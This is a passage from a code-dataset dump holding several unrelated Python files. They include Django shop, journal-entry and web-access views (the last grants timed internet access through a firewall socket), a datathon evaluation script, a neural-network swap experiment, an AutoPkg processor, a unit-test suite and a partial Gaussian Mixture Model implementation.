product.id ) in cart.as_dict()\n\n\t\tlocation = Location( request.session, 'shop' )\n\t\tif location.is_set():\n\t\t\tback = location.get()\n\t\telse:\n\t\t\tback = None\n\n\t\treturn super( ProductView, self ).view(\trequest, \n\t\t\t\t\t\t\t\t\t\t\t\tshop_name, \n\t\t\t\t\t\t\t\t\t\t\t\t{ \n\t\t\t\t\t\t\t\t\t\t\t\t\t'back': back, \n\t\t\t\t\t\t\t\t\t\t\t\t\t'product': product, \n\t\t\t\t\t\t\t\t\t\t\t\t\t'in_cart': in_cart, \n\t\t\t\t\t\t\t\t\t\t\t\t\t'opt': req_get[ 'opt' ] if 'opt' in req_get else None \n\t\t\t\t\t\t\t\t\t\t\t\t} )","sub_path":"trunk/project/dargent/shops/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"542102194","text":"# The football.csv file contains the results from the English Premier League. \n# The columns labeled ‘Goals’ and ‘Goals Allowed’ contain the total number of \n# goals scored for and against each team in that season (so Arsenal scored 79 goals \n# against opponents, and had 36 goals scored against them). Write a program to read the file, \n# then print the name of the team with the smallest difference in ‘for’ and ‘against’ goals.\n\nimport csv\nwith open('football.csv', newline = '') as csvfile:\n reader = csv.reader(csvfile)\n data = [row for row in reader]\n\ngd = [[row[0], abs(int(row[5])-int(row[6]))] for row in data[1:]]\ngd_min = min(gd, key = lambda x: x[1])[1]\n\n# I can't seem to figure out a more concise way to handle the scenario\n# where there is a tie for the smallest difference.\nfor row in gd:\n if row[1] == gd_min:\n print(row[0])\n","sub_path":"python/q8_parsing.py","file_name":"q8_parsing.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"197953478","text":"import csv\nimport pandas as pd\nimport numpy as np\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom .models import JournalentryModel\nfrom .forms import JournalentryForm\nfrom .modules import modules\n\n# Create your views here.\n\n@login_required\ndef indexfunc(request):\n template_name = './journalentryapp/index.html'\n model = JournalentryModel\n object_list = model.objects.all()\n filepath = \"journalentryapp/output/data.csv\"\n context = modules.module_sum(filepath, object_list)\n return render(request, template_name, context)\n\ndef signupfunc(request):\n template_name = './journalentryapp/signup.html'\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n try:\n user = User.objects.create_user(username, '', password)\n return redirect('index')\n except IntegrityError:\n return render(request, template_name, {'error':'このユーザーはすでに登録されています。'})\n return render(request, template_name, {})\n\ndef loginfunc(request):\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n return render(request, './journalentryapp/login.html', {})\n return render(request, './journalentryapp/login.html', {})\n\ndef logoutfunc(request):\n logout(request)\n return redirect('login')\n\ndef createfunc(request):\n template_name = './journalentryapp/create.html'\n model = JournalentryModel\n form = JournalentryForm(request.POST or None)\n context = {}\n if form.is_valid():\n form.save()\n modules.module_output(model)\n return redirect('index')\n context['form'] = form\n return render(request, template_name, context)\n\ndef deletefunc(request, pk):\n template_name = './journalentryapp/delete.html'\n context = {}\n model = JournalentryModel\n obj = get_object_or_404(JournalentryModel, pk=pk)\n if request.method == \"POST\":\n obj.delete()\n modules.module_output(model)\n return redirect('index')\n return render(request, template_name, context)\n\ndef updatefunc(request, pk):\n template_name = './journalentryapp/update.html'\n context = {}\n model = JournalentryModel\n obj = get_object_or_404(JournalentryModel, pk=pk)\n form = JournalentryForm(request.POST or None, instance=obj)\n if form.is_valid():\n form.save()\n modules.module_output(model)\n return redirect('index')\n context['form'] = form\n return render(request, template_name, context)\n\n@login_required\ndef glfunc(request):\n template_name = './journalentryapp/gl.html'\n model = JournalentryModel\n object_list = model.objects.all()\n print(object_list)\n data = pd.read_csv(filepath_or_buffer=\"journalentryapp/output/data.csv\", encoding=\"UTF-8\", sep=\",\")\n data['Dr.price'] = data['Dr.price'].astype(np.int64)\n data['Cr.price'] = data['Cr.price'].astype(np.int64)\n account_list = []\n for account in data['Dr.account']:\n if account not in account_list:\n account_list.append(account)\n for account in data['Cr.account']:\n if account not in account_list:\n account_list.append(account)\n context = {\n 'object_list': object_list,\n 'account_list': account_list,\n }\n return render(request, template_name, context)\n","sub_path":"journalentryapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"71546364","text":"import sys\nfrom typing import Dict, List\nimport pandas as pd\n\nfrom main import main\n\nfrom datathon_ai.interfaces import NOT_COUNTRY_QUESTIONS_NUMBERS\n\nCOUNTRY_QUESTION_ID_5 = [5, 6, 7]\nCOUNTRY_QUESTION_ID_7 = [9, 10]\nCOUNTRY_QUESTION_ID_8 = [11, 12]\nCOUNTRY_QUESTION_ID_14 = [18, 19, 20]\nCOUNTRY_GROUPED_QUESTIONS = [\n COUNTRY_QUESTION_ID_5, COUNTRY_QUESTION_ID_7, COUNTRY_QUESTION_ID_8, COUNTRY_QUESTION_ID_14\n]\n\n\ndef evalutate(annotation_path: str):\n \"\"\"\n Function that computes the accuracy of form filling.\n :param annotation_path: path of the csv annotation file\n :return:\n\n A special computation is done for the grouped questions. A grouped question is a list of questions associated to\n the same global question. For instance questions 5, 6, 7 are associated to global questions\n \"What are the mentionned recipient countries ?\". For each group question, we compute them in the method\n compute_grouped_metric.\n \"\"\"\n # Compute predictions and format it into a dataframe\n predictions = main()\n print(\"\\n###############\")\n print(\"RUNNING EVALUATION\")\n predictions = [\n {\"question_number\": question_number, \"response_id\": response_id}\n for question_number, response_id in predictions.items()\n ]\n predictions_df = pd.DataFrame(predictions)\n print(f\"Number of Predictions : {predictions_df.shape[0]}\")\n assert set(predictions_df.columns.tolist()) == {\"response_id\", \"question_number\"}\n\n # Load annotation file\n ground_truth_df = pd.read_csv(annotation_path)\n print(f\"Number of ground truth : {ground_truth_df.shape[0]}\")\n\n assert ground_truth_df.shape[0] == predictions_df.shape[0]\n assert set(ground_truth_df[\"question_number\"].unique().tolist()) == set(predictions_df[\"question_number\"].unique().tolist())\n\n # Join both dataframe on keys [\"question_number\", \"filename\"]\n df_evaluate = pd.merge(\n ground_truth_df, predictions_df, on=\"question_number\", suffixes=[\"_truth\", \"_prediction\"]\n )\n assert df_evaluate.shape[0] == predictions_df.shape[0]\n\n # Run evaluation : accuracy of filled forms (10 documents in documents_directory)\n print(\"###########################\")\n positive_results = 0\n res_by_questions: Dict[str, List[float]] = {}\n for i in range(0, 10):\n company_result = []\n for group in COUNTRY_GROUPED_QUESTIONS:\n group_formated = [question_number + i * 22 for question_number in group]\n score = compute_grouped_metric(df_evaluate, group_formated)\n company_result.append(score)\n group_string = \"|\".join([str(question_n) for question_n in group])\n if group_string in res_by_questions:\n res_by_questions[group_string].append(score)\n else:\n res_by_questions[group_string] = [score]\n for question in NOT_COUNTRY_QUESTIONS_NUMBERS:\n question_formated = question + i * 22\n df_filter_question = df_evaluate[(df_evaluate[\"question_number\"] == question_formated)]\n assert df_filter_question.shape[0] == 1\n truth_value = df_filter_question[\"response_id_truth\"].values[0]\n prediction = df_filter_question[\"response_id_prediction\"].values[0]\n if truth_value == prediction:\n score = 1\n else:\n score = 0\n company_result.append(score)\n if str(question) in res_by_questions:\n res_by_questions[str(question)].append(score)\n else:\n res_by_questions[str(question)] = [score]\n\n company_score = sum(company_result)/len(company_result)\n positive_results += company_score\n print(f\"COMPANY {i} : {company_score*100} % of form completion\")\n\n # Results by question_id\n print(\"\\n###########################\")\n for question in res_by_questions:\n score_question_details = res_by_questions[question]\n assert len(score_question_details) == 10\n print(f\"QUESTION {question} : {(sum(score_question_details)/10)*100} % of completion for all companies\")\n\n # GLOBAL RESULT\n global_result = positive_results / 10\n print(\"\\n###########################\")\n print(f\"MEAN RATIO OF FORM COMPLETION BY COMPANY : {global_result*100}\")\n\n\ndef compute_grouped_metric(df_evaluate: pd.DataFrame, questions_in_group: List[int]) -> float:\n \"\"\"\n Method that compute metric for a group question for a specific filename (ie company).\n :param df_evaluate: dataframe of evaluation merging predictions and ground truth annotations.\n Columns are : filename, question_number, response_id_truth, response_id_prediction\n :param questions_in_group: a list of questions number related to the same global question.\n :return: a score\n \"\"\"\n df_filter = df_evaluate[(df_evaluate[\"question_number\"].isin(questions_in_group))]\n assert df_filter.shape[0] == len(questions_in_group)\n # Exact match between the ground truth and prediction\n if df_filter[\"response_id_truth\"].equals(df_filter[\"response_id_prediction\"]):\n return 1\n # If ground truth first element is equaled to 0, then all ground truth elements in df_filter are equaled to 0.\n # It's due to annotation specification. So there is at least one element in response_id_prediction not equaled to 0.\n # So the score is 0.\n elif df_filter[\"response_id_truth\"].iloc[0] == 0:\n return 0\n\n # Compare prediction and ground truth by question if first element of ground truth is not null.\n else:\n i = 0\n res = []\n for i in range(len(questions_in_group)):\n ground_truth_q = df_filter[\"response_id_truth\"].iloc[i]\n pred_q = df_filter[\"response_id_prediction\"].iloc[i]\n if ground_truth_q != 0:\n if ground_truth_q == pred_q:\n res.append(1)\n else:\n res.append(0)\n elif pred_q != 0:\n res.append(0)\n\n return sum(res)/len(res)\n\n\nif __name__ == \"__main__\":\n annotation_path = sys.argv[1]\n evalutate(annotation_path)","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"116510923","text":"\"\"\"\nSwap input (rinp) on output (rout) with one extra registers (rtmp)\n\"\"\"\nimport pickle as pk\nimport itertools as it\nimport numpy as np\nimport torch as tr\nimport matplotlib.pyplot as pt\nfrom ghu import *\nfrom codec import Codec\nfrom controller import Controller\nfrom lvd import lvd\nfrom reinforce import reinforce\n\ndef swap_trial(distribution_variance_coefficient, save_file):\n\n # Configuration\n num_symbols = 10\n layer_sizes = {\"rinp\": 32, \"rout\":32, \"rtmp\": 32}\n hidden_size = 32\n rho = .99\n plastic = []\n num_episodes = 100\n\n # Setup GHU\n symbols = [str(a) for a in range(num_symbols)]\n pathways, associations = default_initializer( # all to all\n layer_sizes.keys(), symbols)\n codec = Codec(layer_sizes, symbols, rho=rho, ortho=True)\n controller = Controller(layer_sizes, pathways, hidden_size, plastic)\n ghu = GatedHebbianUnit(\n layer_sizes, pathways, controller, codec,\n batch_size = num_episodes, plastic = plastic)\n ghu.associate(associations)\n\n # Initialize layers\n separator = \"0\"\n ghu.fill_layers(separator)\n\n # Generate dataset\n all_inputs = list(it.permutations(symbols[1:],2))\n split = int(.80*len(all_inputs))\n\n # example generation\n def example(dataset):\n # Randomly choose echo symbol (excluding 0 separator)\n inputs = dataset[np.random.randint(len(dataset))]\n targets = inputs[::-1]\n return inputs, targets\n def training_example(): return example(all_inputs[:split])\n def testing_example(): return example(all_inputs[split:])\n \n # all or nothing reward\n def reward(ghu, targets, outputs):\n r = np.zeros(len(outputs))\n outputs = np.array([out for out in outputs[1:] if out != separator])\n if len(outputs) == len(targets): r[-1] = (targets == outputs).all()\n return r\n \n # Run optimization\n avg_rewards, avg_general, grad_norms = reinforce(ghu,\n num_epochs = 100,\n episode_duration = 3,\n training_example = training_example,\n testing_example = testing_example,\n reward = reward,\n task = \"swap\",\n learning_rate = .1,\n distribution_variance_coefficient = distribution_variance_coefficient,\n verbose = 1,\n save_file = save_file)\n\nif __name__ == \"__main__\":\n print(\"*******************************************************\")\n \n dvcs = [0.]\n # dvcs = [0., 0.001, 0.01, 0.1, 1.]\n # dvcs = [.0005, 0.005, 0.05, 0.5]\n # dvcs = [0., .0005, 0.001, .005, 0.01, .05, 0.1, .5, 1.]\n num_reps = 30\n save_base = \"results/swap/run_%f_%d.pkl\"\n \n # # Run the experiment\n # for dvc in dvcs:\n # for rep in range(num_reps):\n # save_file = save_base % (dvc, rep)\n # swap_trial(dvc, save_file)\n\n # Load results\n # dvcs = [0., .0005, 0.001, .005, 0.01, .05, 0.1, .5, 1.]\n results = {}\n for dvc in dvcs:\n results[dvc] = {}\n for rep in range(num_reps):\n save_file = save_base % (dvc, rep)\n with open(save_file,\"rb\") as f:\n results[dvc][rep] = pk.load(f)\n \n # Plot testing/generalization error\n results = results[0.]\n avg_rewards = np.array([results[rep][1] for rep in results.keys()]).T\n avg_general = np.array([results[rep][2] for rep in results.keys()]).T\n\n bg = (.9,.9,.9) # background color\n fg = (.1, .1, .1) # foreground color\n numsp = 2 # 3\n # pt.figure(figsize=(4.25,3.85))\n pt.figure(figsize=(4.25,2.6))\n pt.subplot(numsp,1,1)\n pt.plot(avg_rewards, c=bg, zorder=0)\n pt.plot(avg_rewards.mean(axis=1), c=fg, zorder=1, label = \"Average over %d trials\" % len(results))\n pt.legend(loc=\"lower right\")\n pt.ylabel(\"Train Rewards\")\n\n pt.subplot(numsp,1,2)\n pt.plot(avg_general, c=bg, zorder=0)\n pt.plot(avg_general.mean(axis=1), c=fg, zorder=1) #, label = \"Average over %d trials\" % len(results))\n # pt.legend(loc=\"lower right\")\n pt.ylabel(\"Test Rewards\")\n \n # pt.subplot(numsp,1,3)\n # pt.plot((avg_rewards-avg_general).T, c=bg, zorder=0)\n # pt.plot((avg_rewards-avg_general).mean(axis=0), c=fg, zorder=1) #, label=\"Avg. over %d trials\" % num_reps)\n # # pt.legend(loc=\"upper right\")\n # pt.ylabel(\"Train - Test\")\n # pt.xlabel(\"Epoch\")\n \n pt.tight_layout()\n pt.savefig(\"swap_curves.eps\")\n # pt.show()\n \n \n ### Old dvc plots \n # # Plot results\n # pt.figure(figsize=(4.25,1.85))\n # bg = (.9,.9,.9) # background color\n # # dvcs_sub = [0., 0.01, 1.]\n # # dvcs_sub = dvcs[:3]\n # dvcs_sub = dvcs\n # for d,dvc in enumerate(dvcs_sub):\n # avg_rewards = np.array([results[dvc][rep][2] # generalization\n # for rep in results[dvc].keys()]).T\n\n # pt.plot(avg_rewards, c=bg, zorder=0)\n # fg = tuple([float(d)/len(dvcs_sub)]*3) # foreground color\n # pt.plot(avg_rewards.mean(axis=1), c=fg, zorder=1, label=(\"$\\lambda$=%.2f\" % dvc))\n\n # pt.title(\"Testing set\")\n # pt.ylabel(\"Average Reward\")\n # pt.xlabel(\"Epoch\")\n # pt.legend(loc=\"lower right\")\n # pt.tight_layout()\n # pt.savefig('swap_learning_curves.eps')\n # pt.show()\n \n # # Histograms of final rewards\n # pt.figure(figsize=(4.25,2))\n # finals = []\n # for d,dvc in enumerate(dvcs):\n # avg_rewards = np.array([results[dvc][rep][1]\n # for rep in results[dvc].keys()]).T\n # finals.append(avg_rewards[-1,:])\n # # pt.boxplot(finals, showfliers=False)\n # means = [f.mean() for f in finals]\n # stds = [f.std() for f in finals]\n # pt.errorbar(range(len(dvcs)), means, fmt='ko', yerr=stds, capsize=10)\n\n # # pt.title(\"Final Average Rewards\")\n # pt.ylabel(\"Reward\")\n # pt.xlabel(\"$\\lambda$\")\n # # locs, _ = pt.xticks()\n # # pt.xticks(locs[1:-1], [\"%.1e\" % dvc for dvc in dvcs])\n # pt.xticks(range(len(dvcs)), [\"%.4f\" % dvc for dvc in dvcs], rotation=45)\n # pt.tight_layout()\n # pt.savefig('swap_finals.eps')\n # pt.show()\n\n\n","sub_path":"swap_experiments.py","file_name":"swap_experiments.py","file_ext":"py","file_size_in_byte":5971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"251295548","text":"#!/usr/bin/env python\n\nimport re\nfrom autopkglib import Processor, ProcessorError\n\n__all__ = [\"FetchVersionParser\"]\n\nclass FetchVersionParser(Processor):\n '''Provides URL to the latest version.'''\n\n input_variables = {\n\t\t\t\"version\": {\n\t\t\t\t\"required\": True,\n\t\t\t\t\"description\": \"version string to parse.\",\n\t\t\t},\n }\n output_variables = {\n 'version': {\n 'description': 'The corrected version'\n }\n }\n\n description = __doc__\n\n def parse_version(self, v_string):\n version = re.sub(r'\\([^)]*\\)', '', v_string)\n return version.strip()\n\n def main(self):\n version = self.env['version']\n self.env['version'] = self.parse_version(version)\n self.output('Version: %s' % self.env['version'])\n\nif __name__ == '__main__':\n processor = FetchVersionParser()\n processor.execute_shell()","sub_path":"Fetch/FetchVersionParser.py","file_name":"FetchVersionParser.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"260576549","text":"from datetime import datetime, timedelta\nimport re\nimport socket\nimport subprocess\n\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.shortcuts import redirect, get_object_or_404\n\nfrom netaddr import EUI, IPAddress, mac_unix, AddrFormatError\n\nfrom .models import WebRequest\nfrom django.conf import settings\nfrom django.http import HttpResponse\n\n\"\"\"\nThis module contains web-access request specific Python functions for\ncommunicating with the firewall.\n\"\"\"\n\n\ndef _sendRaw(eui, minutes):\n \"\"\" Allows internet access on device with MAC address for some minutes\n\n Sends a string over a TCP socket to the firewall. Must be run on server\n accepted by firewall.\n \"\"\"\n if not isinstance(eui, EUI):\n raise ValueError(\"Expected eui to be of type EUI\")\n if not isinstance(minutes, int):\n raise ValueError(\"Expected minutes to be int\")\n eui.dialect = mac_unix\n eui.dialect.word_fmt = \"%.2X\"\n soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n soc.settimeout(1.0)\n soc.connect((settings.HOST, settings.PORT))\n soc.sendall(\"%s %d\" % (str(eui), minutes))\n soc.close()\n\n\ndef _getEUI(ipAddress, mac=\"\"):\n \"\"\" Returns EUI from IPAddress \"\"\"\n if not isinstance(ipAddress, IPAddress):\n raise ValueError(\"Expected ipAddress to be of type netaddr.IPAddress\")\n if mac == \"\":\n mac = _getMAC(ipAddress)\n # mac is None if testing on localhost\n if mac is None:\n return mac\n eui = EUI(mac)\n eui.dialect = mac_unix\n eui.dialect.word_fmt = \"%.2X\"\n return eui\n\n\ndef _getMAC(ipAddress):\n \"\"\" Get MAC from IP address \"\"\"\n proc = subprocess.Popen([\"arp\", \"-n\", str(ipAddress)], stdout=subprocess.PIPE)\n result = proc.communicate()[0]\n # Matches MAC address\n matches = re.search('\\s([a-zA-Z0-9]{1,2}(?::[a-zA-Z0-9]{1,2}){5})\\s', result, re.MULTILINE)\n if matches is None:\n return None\n return matches.group(1)\n\n\ndef _getIPAddress(request):\n \"\"\" Returns IPAddress object \"\"\"\n x_forwarded_for = request.META.get(\"HTTP_X_FORWARDED_FOR\", \"\") or request.META.get(\"REMOTE_ADDR\")\n return IPAddress(x_forwarded_for.split(',')[0])\n\n\ndef getRemoteAddress(request):\n return HttpResponse(_getMAC(_getIPAddress(request)))\n\n\ndef startAccess(request, id):\n ipAddress = _getIPAddress(request)\n eui = _getEUI(ipAddress)\n if not eui:\n message = \"Unable to get internet access. Could not get EUI from IP Address %s.\" % ipAddress\n messages.add_message(request, messages.ERROR, message)\n else:\n webRequest = get_object_or_404(WebRequest, pk=id)\n if not webRequest.time_started:\n webRequest.time_started = datetime.now()\n webRequest.save()\n minutes = int(round((webRequest.time_started - datetime.now() + timedelta(minutes=webRequest.minutes)).total_seconds() / 60))\n _sendRaw(eui, minutes)\n message = \"Web accesss granted for %s minutes.\" % minutes\n messages.add_message(request, messages.SUCCESS, message)\n # Redirect to original page. This request is sent from login and trainee web access list pages\n return redirect(request.META.get('HTTP_REFERER', reverse_lazy('home')))\n\n\ndef startAccessFromMacAddress(request, minutes, mac_address):\n try:\n eui = EUI(mac_address)\n except AddrFormatError:\n messages.add_message(request, messages.ERROR, \"Invalid MAC Address! Please check again.\")\n else:\n eui.dialect = mac_unix\n eui.dialect.word_fmt = \"%.2X\"\n _sendRaw(eui, int(minutes))\n messages.add_message(request, messages.SUCCESS, \"Internet access started for %s!\" % mac_address)\n","sub_path":"ap/web_access/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"458260907","text":"#!/usr/bin/env python3\n#\n# Copyright (c) 2019 Roberto Riggio\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Full unit test suite.\"\"\"\n\nimport unittest\nfrom .projects import TestProjects\nfrom .accounts import TestAccounts\nfrom .acls import TestACLs\nfrom .wtps import TestWTPs\nfrom .vbses import TestVBSes\nfrom .wifislices import TestWiFiSlices\nfrom .lteslices import TestLTESlices\nfrom .applications import TestApplications\nfrom .workers import TestWorkers\nfrom .alerts import TestAlerts\n\n\ndef full_suite():\n \"\"\"Full unit test suite.\"\"\"\n\n suite = unittest.TestSuite()\n\n suite.addTest(TestAlerts('test_create_new_alert'))\n suite.addTest(TestAlerts('test_create_new_alert_empty_body'))\n suite.addTest(TestAlerts('test_subscriptions'))\n suite.addTest(TestAlerts('test_update_alert'))\n suite.addTest(TestAlerts('test_wtps'))\n\n suite.addTest(TestWorkers('test_register_new_worker'))\n suite.addTest(TestWorkers('test_register_new_worker_fixed_uuid'))\n suite.addTest(TestWorkers('test_register_new_worker_duplicate_no_uuid'))\n suite.addTest(TestWorkers('test_register_new_worker_different_params'))\n suite.addTest(TestWorkers('test_register_new_worker_duplicate_uuid'))\n suite.addTest(TestWorkers('test_register_new_worker_invalid_creds'))\n suite.addTest(TestWorkers('test_register_existing_worker'))\n suite.addTest(TestWorkers('test_modify_worker_invalid_param_name'))\n suite.addTest(TestWorkers('test_modify_worker_param'))\n suite.addTest(TestWorkers('test_modify_worker_invalid_param_value'))\n suite.addTest(TestWorkers('test_add_callback'))\n\n suite.addTest(TestAccounts('test_simple_gets'))\n suite.addTest(TestAccounts('test_create_existing_user'))\n\n suite.addTest(TestAccounts('test_create_new_user_missing_field'))\n\n suite.addTest(TestAccounts('test_create_new_user'))\n suite.addTest(TestAccounts('test_update_user_details'))\n suite.addTest(TestAccounts('test_credentials'))\n\n suite.addTest(TestProjects('test_simple_gets'))\n suite.addTest(TestProjects('test_create_new_project'))\n suite.addTest(TestProjects('test_create_wifi_project'))\n suite.addTest(TestProjects('test_create_wifi_project_default_bssid_type'))\n suite.addTest(TestProjects('test_create_wifi_project_wrong_bssid_type'))\n suite.addTest(TestProjects('test_create_lte_project'))\n suite.addTest(TestProjects('test_create_lte_project_wrong_plmnid'))\n\n suite.addTest(TestACLs('test_add_acls'))\n suite.addTest(TestACLs('test_add_acls_invalid_creds'))\n suite.addTest(TestACLs('test_modify_acls'))\n suite.addTest(TestACLs('test_delete_all_acls'))\n\n suite.addTest(TestWTPs('test_create_new_device_empty_body'))\n suite.addTest(TestWTPs('test_create_new_device_wrong_address'))\n suite.addTest(TestWTPs('test_create_new_device'))\n suite.addTest(TestWTPs('test_create_new_device_custom_desc'))\n suite.addTest(TestWTPs('test_update_device_desc'))\n\n suite.addTest(TestVBSes('test_create_new_device_empty_body'))\n suite.addTest(TestVBSes('test_create_new_device_wrong_address'))\n suite.addTest(TestVBSes('test_create_new_device'))\n suite.addTest(TestVBSes('test_create_new_device_custom_desc'))\n suite.addTest(TestVBSes('test_update_device_desc'))\n\n suite.addTest(TestWiFiSlices('test_create_new_wifi_slice'))\n suite.addTest(TestWiFiSlices('test_create_new_wifi_slice_after_prj'))\n suite.addTest(TestWiFiSlices('test_update_wifi_slice'))\n suite.addTest(TestWiFiSlices('test_delete_default_wifi_slice'))\n\n suite.addTest(TestLTESlices('test_create_new_lte_slice'))\n suite.addTest(TestLTESlices('test_create_new_lte_slice_after_prj'))\n suite.addTest(TestLTESlices('test_update_lte_slice'))\n suite.addTest(TestLTESlices('test_delete_default_lte_slice'))\n\n suite.addTest(TestApplications('test_register_new_app'))\n suite.addTest(TestApplications('test_register_new_app_fixed_uuid'))\n suite.addTest(TestApplications('test_register_new_app_duplicate_no_uuid'))\n suite.addTest(TestApplications('test_register_new_app_different_params'))\n suite.addTest(TestApplications('test_register_new_app_duplicate_uuid'))\n suite.addTest(TestApplications('test_register_existing_app_invalid_creds'))\n suite.addTest(TestApplications('test_register_existing_app'))\n suite.addTest(TestApplications('test_modify_app_invalid_param_name'))\n suite.addTest(TestApplications('test_modify_app_param'))\n suite.addTest(TestApplications('test_modify_app_invalid_param_value'))\n suite.addTest(TestApplications('test_register_new_app_parameters'))\n\n return suite\n\n\nif __name__ == '__main__':\n unittest.TextTestRunner().run(full_suite())\n","sub_path":"tests/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"555666613","text":"\"\"\"\r\nGaussian Mixture Model\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy.misc as spmisc\r\n\r\nfrom ..prob_dists import MultiGauss\r\nfrom mu.cluster import *\r\n\r\n\r\nclass GMM():\r\n \"\"\" GMM implementation \"\"\"\r\n def __init__(self, X, K=50, n_iter=100):\r\n self.X = X\r\n self.N = self.X.shape[0]\r\n self.K = K\r\n self.n_iter = n_iter\r\n self.rz = None\r\n self.pi = None\r\n self.mu = None\r\n self.sigma = None\r\n\r\n def init_parameter(self, method='random'):\r\n if method == 'random':\r\n ## 乱数で初期化\r\n self.pi = np.ones(self.K) / self.K\r\n self.mu = np.random.rand( self.K, self.X.shape[1] ) * 2.0 - 1\r\n self.sigma = np.zeros( (self.K, self.X.shape[1], self.X.shape[1]), dtype=np.float64 )\r\n for k in range(self.K):\r\n self.sigma[k] = np.eye(self.X.shape[1])\r\n # self.sigma[k] = np.ones( (self.X.shape[1],self.X.shape[1]) )\r\n\r\n elif method == 'kmeans':\r\n ## k-means法で初期化\r\n whitenX = whiten_cy(self.X)\r\n label,center = kmeans_cy(whitenX, K=self.K, max_iter=50, n_rep=10)\r\n\r\n self.mu = center\r\n for k in range(self.K):\r\n cur_k_idx = np.where(label == k)[0]\r\n self.pi[k] = len(cur_k_idx)\r\n cur_k_obs = self.X[cur_k_idx]\r\n self.sigma[k] = np.cov(cur_k_obs)\r\n self.pi /= self.pi.sum()\r\n \r\n self.rz = np.zeros( (self.N,self.K), dtype=np.float64 )\r\n \r\n def train(self):\r\n \"\"\"\r\n パラメータ学習(EMアルゴリズム)\r\n \"\"\"\r\n\r\n ## initialize pi,mu,sigma\r\n self.init_parameter(method='random')\r\n\r\n for it in range(self.n_iter):\r\n print( 'iterates {0}'.format(it) )\r\n\r\n ## e-step: update rz\r\n for n in range(self.N):\r\n # 普通に計算する\r\n # gmm_pdfs = np.zeros(self.K)\r\n # for k in xrange(self.K):\r\n # gmm_pdfs[k] = self.pi[k] * MultiGauss(self.mu[k],self.sigma[k]).prob(self.X[n])\r\n\r\n # 対数領域にもっていってから計算する\r\n gmm_logpdfs = np.zeros(self.K)\r\n for k in range(self.K):\r\n gmm_logpdfs[k] = np.log(self.pi[k]) + MultiGauss(self.mu[k],self.sigma[k]).log_prob(self.X[n])\r\n gmm_pdfs = np.exp(gmm_logpdfs - spmisc.logsumexp(gmm_logpdfs))\r\n\r\n for k in range(self.K):\r\n self.rz[n,k] = gmm_pdfs[k] / gmm_pdfs.sum(0)\r\n\r\n # self.rz = np.maximum(self.rz, 1e-10)\r\n self.rz /= self.rz.sum(1)[:,np.newaxis]\r\n\r\n print('rz:')\r\n print(self.rz)\r\n print( self.rz.min() )\r\n\r\n ## m-step: update mu,sigma,pi\r\n Nk = self.rz.sum(0)\r\n for k in range(self.K):\r\n cur_rz = self.rz[:,k]\r\n self.mu[k] = 1.0/Nk[k] * (cur_rz[:,np.newaxis] * self.X ).sum(0)\r\n\r\n for k in range(self.K):\r\n cov_mat_sum = np.zeros( (self.X.shape[1],self.X.shape[1]), dtype=np.float64 )\r\n for n in range(self.N):\r\n cov_mat_sum += self.rz[n,k] * np.dot( (self.X[n]-self.mu[k])[:,np.newaxis], (self.X[n]-self.mu[k])[np.newaxis,:])\r\n # for d1 in xrange(self.X.shape[1]):\r\n # for d2 in xrange(self.X.shape[1]):\r\n # self.sigma[k,d1,d2] = ( self.rz[:,k] * (self.X[:,d1]-self.mu[k,d1]) * (self.X[:,d2]-self.mu[k,d2]) ).sum()\r\n self.sigma[k] = cov_mat_sum / Nk[k]\r\n\r\n # if linalg.det(self.sigma[k]) <= 0.0:\r\n # print 'det(Sigma)=0'\r\n # print self.sigma[k]\r\n\r\n for k in range(self.K):\r\n self.pi[k] = Nk[k] / float(self.N)\r\n\r\n print('pi:')\r\n print(self.pi)\r\n print('mu:')\r\n print(self.mu)\r\n print('sigma:')\r\n print(self.sigma)\r\n\r\n # L = self.likelihood(self.X)\r\n # print 'likelihood={0}'.format(L)\r\n\r\n def likelihood(self, X):\r\n \"\"\"\r\n データXに対するモデルの尤度を計算する\r\n \"\"\"\r\n L = 0.0\r\n if X.ndim == 2:\r\n N = X.shape[0]\r\n\r\n for n in range(N):\r\n gauss_sum = 0.0\r\n for k in range(self.K):\r\n gauss_sum += np.exp( np.log(self.pi[k]) + MultiGauss(self.mu[k],self.sigma[k]).log_prob(X[n]) )\r\n L += gauss_sum\r\n\r\n elif X.ndim == 1:\r\n for k in range(self.K):\r\n L += np.exp( np.log(self.pi[k]) + 